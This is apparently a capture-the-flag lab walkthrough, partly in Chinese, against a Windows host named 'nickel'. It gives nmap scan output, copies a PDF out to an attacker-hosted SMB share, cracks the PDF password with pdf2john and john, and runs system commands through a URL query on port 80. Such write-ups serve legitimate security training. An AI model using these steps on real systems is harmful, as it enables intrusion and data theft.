PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 5040/tcp open unknown 8089/tcp open unknown 33333/tcp open dgi-serv 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown
PORT STATE SERVICE VERSION 21/tcp open ftp FileZilla ftpd 0.9.60 beta | ftp-syst: |_ SYST: UNIX emulated by FileZilla 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0) | ssh-hostkey: | 3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA) | 256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA) |_ 256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519) 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Site doesn't have a title. 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=nickel | Not valid before: 2025-09-16T11:03:04 |_Not valid after: 2026-03-18T11:03:04 |_ssl-date: 2025-09-17T11:56:01+00:00; 0s from scanner time. | rdp-ntlm-info: | Target_Name: NICKEL | NetBIOS_Domain_Name: NICKEL | NetBIOS_Computer_Name: NICKEL | DNS_Domain_Name: nickel | DNS_Computer_Name: nickel | Product_Version: 10.0.18362 |_ System_Time: 2025-09-17T11:54:50+00:00 5040/tcp open unknown 8089/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Site doesn't have a title. |_http-server-header: Microsoft-HTTPAPI/2.0 33333/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Site doesn't have a title. |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
impacket-smbserver share ./ -smb2support -username kali -password kali net use \\192.168.45.227\share /user:kali kali copy Infrastructure.pdf \\192.168.45.227\share
使用 exiftool 工具查看 PDF 文件详情,发现文件设置了密码。
1
exiftool Infrastructure.pdf
使用 pdf2john 工具将 PDF 转换为 john 可识别的格式,破解得到 PDF 密码。
1 2
pdf2john Infrastructure.pdf > hash john --wordlist=~/Desktop/rockyou.txt hash
打开 PDF 文档,说明信息提示在 URL 后使用问号可临时执行命令。
我们不使用域名直接通过靶机 80 端口也可执行系统命令。
1
http://192.168.164.99/?whoami
提权的过程非常不顺利,靶机 80 端口非常脆弱,稍微扫描一下就会挂掉,导致后面得到了 PDF 提示内容,尝试执行命令一直没有响应。